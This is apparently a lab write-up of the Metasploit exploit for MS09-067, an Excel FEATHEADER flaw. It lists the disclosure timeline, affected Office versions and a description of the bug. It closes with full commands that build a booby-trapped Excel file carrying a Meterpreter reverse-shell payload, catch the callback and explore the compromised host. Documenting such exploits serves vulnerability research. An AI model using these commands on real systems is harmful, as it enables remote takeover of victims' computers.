Timeline :

Vulnerability reported to Microsoft by ZDI the 2009-10-20
Microsoft patch “KB973475” provided the 2009-11-10
Metasploit PoC provided by hdm the 2010-02-12
Exploit-DB PoC provided by anonymous the 2010-08-21

PoC provided by :

Sean Larsson
jduck

Reference(s) :

CVE-2009-3129
MS09-067

Affected version(s) :

Microsoft Office XP Service Pack 3
Microsoft Office 2003 Service Pack 3
2007 Microsoft Office System SP1 & SP2
Microsoft Office 2004 for Mac
Microsoft Office 2008 for Mac
Microsoft Office Excel Viewer SP1 & SP2
Microsoft Office Excel Viewer 2003 SP3

Tested on Windows XP SP3 with :

Office Excel 2003 SP3 before KB973475

Description :

This module exploits a vulnerability in the handling of the FEATHEADER record by Microsoft Excel. Revisions of Office XP and later prior to the release of the MS09-067 bulletin are vulnerable. When processing a FEATHEADER (Shared Feature) record, Microsoft used a data structure from the file to calculate a pointer offset without doing proper validation. Attacker supplied data is then used to calculate the location of an object, and in turn a virtual function call. This results in arbitrary code exection. NOTE: On some versions of Office, the user will need to dismiss a warning dialog prior to the payload executing.

Commands :

use exploit/windows/fileformat/ms09_067_exce­l_featheader
set OUTPUTPATH /home/eromang
set TARGET 2
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sessions -i 1
sysinfo
getuid
ipconfig